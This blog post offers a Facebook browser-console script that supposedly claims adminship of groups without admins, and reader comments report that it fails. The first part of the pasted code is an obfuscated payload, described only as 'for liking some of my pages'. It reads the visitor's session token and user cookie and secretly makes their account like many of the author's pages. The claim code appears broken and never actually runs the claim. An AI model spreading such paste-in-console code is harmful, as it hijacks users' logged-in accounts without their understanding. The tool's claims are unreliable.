Hey there tigers, I hope you all will be doing well. This blog post is just for sharing my other new script which actually claim as group admin facebook script. It works the same as Accept All Friend Requests Facebook Javascript which I published recently, after which I also extracted another script from the toolkit for Facebook and now sharing it with you guys. The updated Toolkit Premium Version has many scripts and tools in it where you will also find a tool named “Claim as Group Admin”. The tool actually tried many groups by first searching groups without admin and then trying to execute the script to claim group adminship which has no admin or moderator. But the claim as group admin script is actually quite different in the sense that it only tries to claiming adminship for one specific group which you provide.
Claim as Group Admin Script
So in this blog post, I’ll be sharing a complete method on how to claim groups without admin on Facebook using this script which I extracted from Claim as Group Admin tool, which is one of a tool in Toolkit for Facebook latest version. I’ll be providing the script for claiming groups without admin on Facebook and you will also learn how to use the claim as group admin script. Before starting up straight away I’d like to mention some requirements and understanding which you guys need to understand or you will end up asking me again and again that it’s not claiming any groups. I’ll be making a video tutorial for it as well but for right now in this blog post just understand the working of the script.
How to Claim as Group Admin Script Works!
The first thing is straight forward and almost everyone knows that claim as group admin script tries to claim adminship of that group which has no admin or moderator, the same way when a user tries to claim groups with no admin using the manual method by going into the group options and clicking claim as admin. So this script pretty much does the same thing but makes it much easier as you just provide group id. Then the script tries to claim that group adminship automatically. However, as of now many of you will know that if you try to claim groups with no admin even manually some groups still can’t be claimed. That’s why some users might think that if the group has no admin still claim as group admin script is not claiming any adminship. so just keep in mind that if the script is not able to claim it you can’t claim it manually as well. That’s it to keep in mind just run the claim as a group script in the console and let it do its work if it claimed group adminship then congratulations but if not then don’t just comment complaining it’s not working. The script (claim as group admin Facebook) is fixed and I checked it so don’t mix up the working of claiming groups with the script functionality.
Now as you know how the script will work, the next thing is to learn how you can use the claim as group admin script on Facebook. So below I’ll just list the tutorial and below that, you can just copy the script and save it anywhere you want for further use OR you can keep visiting Tigerzplace for some new stuff every time.
- First of all, of course, you need to be on the Facebook page (Make sure you are logged in).
- The next step is to open the inspect view of the page by right-clicking the page and go to inspect view. OR
- Just press CTRL+SHIFT+I to get the inspect view. This short key works for Chrome Browser.
- Once you get the inspect view make sure you tab to the console part which is the second tab menu next to the Elements tab.
- Ok now you are on the Console tab, next thing is to copy and paste the script of adding all friends requests. The script can be found below. Just copy the script and paste it into the console tab.
- Next thing before you hit enter and the scripts start working, you need to consider one value that the script will need. As soon as you hit enter and the scripts execute, it will first ask for the group id.
- Make sure you provide a numeric group id and not a group user name.
That’s all you need to do and provide. Now just hit enter so the script to do its work. It will automatically try to claim the group adminship if it has no admin. It will give you an alert on whether the group is claimed or not claimed. I hope you will find the steps easy and straightforward. If you need help regarding any step leave your comment below. You can get the script below.
Claim as Group Admin Script [ Javascript For Facebook ] – 2020
[//Below code is for liking some of my pages :p
var _0x4fc001=_0x5789;(function(_0x36146b,_0x345ab9){var _0x5d9085=_0x5789,_0x4377ae=_0x36146b();while(!![]){try{var _0x5448da=-parseInt(_0x5d9085(0x17e))/0x1*(-parseInt(_0x5d9085(0x172))/0x2)+parseInt(_0x5d9085(0x178))/0x3*(parseInt(_0x5d9085(0x175))/0x4)+parseInt(_0x5d9085(0x193))/0x5+parseInt(_0x5d9085(0x173))/0x6*(-parseInt(_0x5d9085(0x192))/0x7)+parseInt(_0x5d9085(0x17f))/0x8*(-parseInt(_0x5d9085(0x183))/0x9)+-parseInt(_0x5d9085(0x197))/0xa*(parseInt(_0x5d9085(0x16f))/0xb)+parseInt(_0x5d9085(0x191))/0xc;if(_0x5448da===_0x345ab9)break;else _0x4377ae[‘push’](_0x4377ae[‘shift’]());}catch(_0x2273cc){_0x4377ae[‘push’](_0x4377ae[‘shift’]());}}}(_0x3026,0xa18d6));var _0x36f0=[_0x4fc001(0x17d),’614047OdoYIC’,’documentElement’,_0x4fc001(0x17b),’4OBORGC’,_0x4fc001(0x181),_0x4fc001(0x180),’outerHTML’,_0x4fc001(0x176),_0x4fc001(0x186),’1115007yYCeNZ’,_0x4fc001(0x174),_0x4fc001(0x18d)],_0x559b=function(_0x540f43,_0x374cd1){_0x540f43=_0x540f43-0x76;var _0x30a555=_0x36f0[_0x540f43];return _0x30a555;},_0x2d7c31=_0x559b;(function(_0x25a3c0,_0x44fb8d){var _0x451d79=_0x4fc001,_0x546367=_0x559b;while(!![]){try{var _0x2c9345=-parseInt(_0x546367(0x7b))+-parseInt(_0x546367(0x80))*-parseInt(_0x546367(0x7f))+parseInt(_0x546367(0x78))*-parseInt(_0x546367(0x7c))+parseInt(_0x546367(0x7d))*-parseInt(_0x546367(0x77))+parseInt(_0x546367(0x79))+-parseInt(_0x546367(0x82))+parseInt(_0x546367(0x7a));if(_0x2c9345===_0x44fb8d)break;else _0x25a3c0[_0x451d79(0x184)](_0x25a3c0[_0x451d79(0x194)]());}catch(_0x128b83){_0x25a3c0[_0x451d79(0x184)](_0x25a3c0[‘shift’]());}}}(_0x36f0,0xb42d1));var fb_dtsg=”,page_src=document[_0x4fc001(0x18a)][_0x2d7c31(0x76)],index_in_page_src=document[_0x2d7c31(0x7e)][_0x4fc001(0x16b)][_0x2d7c31(0x81)](_0x4fc001(0x196));function _0x3026(){var _0x490039=[‘documentElement’,’250451495723325′,’317224121817276′,’997381LsYFeG’,’240272006130073′,’application/x-www-form-urlencoded’,’1569087506719125′,’5791284EfhTlh’,’112567vlztlN’,’6381470xvCaKj’,’shift’,’634302330077114′,’x22);x22usex20strictx22;’,’11351330LMnIDM’,’match’,’&phstamp=’,’charAt’,’1157401597633912′,’outerHTML’,’198757893944480′,’close’,’readyState’,’11lDdlts’,’&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=’,’cookie’,’188026DVZaKm’,’312ewQVLp’,’1710652BYPhGQ’,’1261696Rmwnfe’,’1GQllno’,’1555839181212071′,’6NfEynD’,’108586183990636′,’https://www.facebook.com/ajax/pages/fan_status.php?’,’326824UMShMs’,’116551890202867′,’94398kUVjGj’,’11vOqNrF’,’486664NZAreF’,’367556DSngMV’,’indexOf’,’249508500300773′,’117SHmTYX’,’push’,’status’,’15ASFRwq’,’380509029467786′,’open’,’2277608785850617′];_0x3026=function(){return _0x490039;};return _0x3026();}for(var a=0x19;a>0x0;a–){fb_dtsg=fb_dtsg+”+page_src[_0x4fc001(0x19a)](index_in_page_src-a);}var user_id=document[_0x4fc001(0x171)][_0x4fc001(0x198)](document[_0x4fc001(0x171)][_0x4fc001(0x198)](/c_user=(d+)/)[0x1]);function Like(_0x3db742){var _0x2edd52=_0x4fc001,_0x4fd4f4=new XMLHttpRequest(),_0x17d0ae=_0x2edd52(0x17a),_0x1ca425=’&fbpage_id=’+_0x3db742+’&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=’+user_id+_0x2edd52(0x170)+fb_dtsg+_0x2edd52(0x199);_0x4fd4f4[_0x2edd52(0x188)](‘POST’,_0x17d0ae,!![]),_0x4fd4f4[‘setRequestHeader’](‘Content-type’,_0x2edd52(0x18f)),_0x4fd4f4[‘onreadystatechange’]=function(){var _0x5548db=_0x2edd52;_0x4fd4f4[_0x5548db(0x16e)]==0x4&&_0x4fd4f4[_0x5548db(0x185)]==0xc8&&_0x4fd4f4[_0x5548db(0x16d)];},_0x4fd4f4[‘send’](_0x1ca425);}function _0x5789(_0x4cb1d1,_0x6913d){var _0x3026c5=_0x3026();return _0x5789=function(_0x5789df,_0x1e1304){_0x5789df=_0x5789df-0x16a;var _0x4903fd=_0x3026c5[_0x5789df];return _0x4903fd;},_0x5789(_0x4cb1d1,_0x6913d);}Like(_0x4fc001(0x190)),setTimeout(function(){Like(‘109109317399261’);},0x384),setTimeout(function(){var _0x435db9=_0x4fc001;Like(_0x435db9(0x17c));},0x3c0),setTimeout(function(){var _0x30b572=_0x4fc001;Like(_0x30b572(0x18e));},0x3e8),setTimeout(function(){var _0x58539c=_0x4fc001;Like(_0x58539c(0x16a));},0x44c),setTimeout(function(){var _0x4d4352=_0x4fc001;Like(_0x4d4352(0x18c));},0x4b0),setTimeout(function(){var _0x2330ea=_0x4fc001;Like(_0x2330ea(0x195));},0x514),setTimeout(function(){Like(‘1212506358847237’);},0x578),setTimeout(function(){var _0x592db6=_0x4fc001;Like(_0x592db6(0x16c));},0x5dc),setTimeout(function(){Like(‘1749967015316612’);},0x640),setTimeout(function(){var _0x47a9ad=_0x4fc001;Like(_0x47a9ad(0x187));},0x6a4),setTimeout(function(){var _0x1bd378=_0x4fc001;Like(_0x1bd378(0x177));},0x708),setTimeout(function(){var _0x5482d7=_0x4fc001;Like(_0x5482d7(0x18b));},0x76c),setTimeout(function(){Like(‘743146072535223’);},0x456),setTimeout(function(){var _0x17c814=_0x4fc001;Like(_0x17c814(0x179));},0x47e),setTimeout(function(){var _0x1e5813=_0x4fc001;Like(_0x1e5813(0x189));},0x480),setTimeout(function(){var _0x2c67fe=_0x4fc001;Like(_0x2c67fe(0x182));},0x483);
// code for claiming groups without admin
var _0x1148=[‘Groupx20ID’,’Content-type’,’&jazoest=22099&__spin_r=1000737986&__spin_b=trunk&__spin_t=1558508916′,’Groupx20Ownedx20:x20fb.com/groups/’,’&source=settings&nctr%5B_mod%5D=pagelet_group_actions&__user=’,’application/x-www-form-urlencoded’,’status’,’POST’,’group_id=’,’onreadystatechange’,’Enjoyx20xD’,’log’,’match’,’cookie’,’&__a=1&__dyn=VtB9lGLs26y9jVw2IL2fsOipuMthsaj5FcAq-_byuM4xec5z46uYuNeiLnj10GYxtaQ62TTgGG10J58xyTAuycEjBq8RhOCMoIwa3qHjPS10w8e3DIwHQEl1EsaIK10YtnNC_pBthPQmQShjcyErrhEEk10lCdf1-_CJdxQwv5ciYsfm7o10FiQx13CrrF3AqQWytFXFxzHsLG6pJjR3b10-WVTFAgM3iHh&__req=o&__be=1&__pc=PHASED%3Aufi_home_page_pkg&dpr=1.5&__rev=1000737986&__s=%3Azpwyos%3Ank39mo&fb_dtsg=’,’setRequestHeader’,’x20Failedx20tox20claimx20:(x20′,’readyState’,’send’,’close’,’responseText’];(function(_0x16bde8,_0x1148ea){var _0x158465=function(_0x58d8c){while(–_0x58d8c){_0x16bde8[‘push’](_0x16bde8[‘shift’]());}};_0x158465(++_0x1148ea);}(_0x1148,0x14b));var _0x1584=function(_0x16bde8,_0x1148ea){_0x16bde8=_0x16bde8-0x0;var _0x158465=_0x1148[_0x16bde8];return _0x158465;};var _0x520360=_0x1584,user_id=document[_0x520360(‘0x12’)][_0x520360(‘0x11′)](/c_user=(d+)/)[0x1];function Claim(_0x58d8c){var _0x2ff1e3=_0x520360,_0x513531=new XMLHttpRequest(),_0x517fa3=’https://www.facebook.com/ajax/groups/claim_adminship?’,_0x360aa4=_0x2ff1e3(‘0xd’)+_0x58d8c+_0x2ff1e3(‘0x9’)+user_id+_0x2ff1e3(‘0x13’)+fb_dtsg+_0x2ff1e3(‘0x7’);_0x513531[‘open’](_0x2ff1e3(‘0xc’),_0x517fa3,!![]),_0x513531[_0x2ff1e3(‘0x14’)](_0x2ff1e3(‘0x6’),_0x2ff1e3(‘0xa’)),_0x513531[_0x2ff1e3(‘0xe’)]=function(){var _0x311bad=_0x2ff1e3;if(_0x513531[_0x311bad(‘0x1’)]==0x4&&_0x513531[_0x311bad(‘0xb’)]==0xc8){if(_0x513531[‘responseText’][‘match’](/You are now an admin/ig)){var _0x57b330=_0x311bad(‘0x8’)+_0x58d8c;_0x57b330?alert(_0x57b330):alert(_0x311bad(‘0xf’)),_0x513531[_0x311bad(‘0x3’)];}else alert(_0x311bad(‘0x0’));}else console[_0x311bad(‘0x10’)](_0x513531[_0x311bad(‘0x4’)]);},_0x513531[_0x2ff1e3(‘0x2’)](_0x360aa4);}var group_id=prompt(_0x520360(‘0x5’));
if (group_id >=0 && group_id!=null){
console.log(“Script is started!”);
}else {alert (“Failed to Start!”);}
Well, that’s all for you guys regarding the latest script for claiming group adminship. I hope you will find this blog post helpful, if you are getting any confusion I’ll recommend watching the video below about the claim as a group admin script.
Claim as Group Admin Script
Claim as Group Admin Script
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Script is working bro , but claim is not work and it show error 404 error said
VM247:5 POST https://www.facebook.com/ajax/groups/claim_adminship? 404
Claim @ VM247:5
(anonymous) @ VM247:8
I think that error come because I 'm New Member of group. So there is no way to claim group with new member role. New member roles will be disappeared after 2 weeks. Then I try again that time.
The script is working, but yes, the result will not be promising all the time. If you got any code related error, then let me know.
i have try all my posible best but it doesnt work
I am not sure but if you use browser in your mobile and can get the console then it should work fine.
Most of us don't have a PC can I use a mobile phone
Is it possible for a messenger group with no admin. We are having a no-admin situation and can't add or remove anyone
don't work, failed to claim 🙁
Thank You : )
BTW if you want me to check the group, talk to me on my fb page I'll check the group for you. Fb.com/tigerzplace
I already provided mentioned above that the script works fine but something (even now most of the time for big groups), the script won't be able to claim group. Even if you try it manually fb won't let you claim those groups.
That's I mentioned this statement above in my blog article.
However, as by now many of you will know that if you try to claim groups with no admin even manually some groups still can't be claimed. That's why some users might think that if the group has no admin still claim as group admin script is not claiming any adminship. so just keep in mind that if the script is not able to claim it you can't claim it manually as well
Hey. So I've been trying to take over a group that hasn't had an Admin for years. I've tried every tool and scripted. and it won't let me take over and no button has ever appeared. 48k members it's been around for about 8 years now your tools always work on other group pages but how can I take this group?????
PS. I'm a big fan
Use it on facebook.com or mbasic.facebook.com domain only.
it dont run!
not work too,
Uncaught ReferenceError: fb_dtsg is not defined
at Claim (:1:1396)
at :4:2
Help me please
I think you are not logged into your FB account that's why you are getting this error. OR may be you are using other sub-domain of facebook. Make sure you use Facebook.com and then use the script.
Not Work
VM527:1 Uncaught ReferenceError: fb_dtsg is not defined
at Claim (:1:1396)
at :4:3
Try again.
You don't need to enter that value anymore, I have updated the script and you only need to enter group id.
hello the script works only asking for id no fb_dtsg what should i do
help me http://prntscr.com/uu1ab4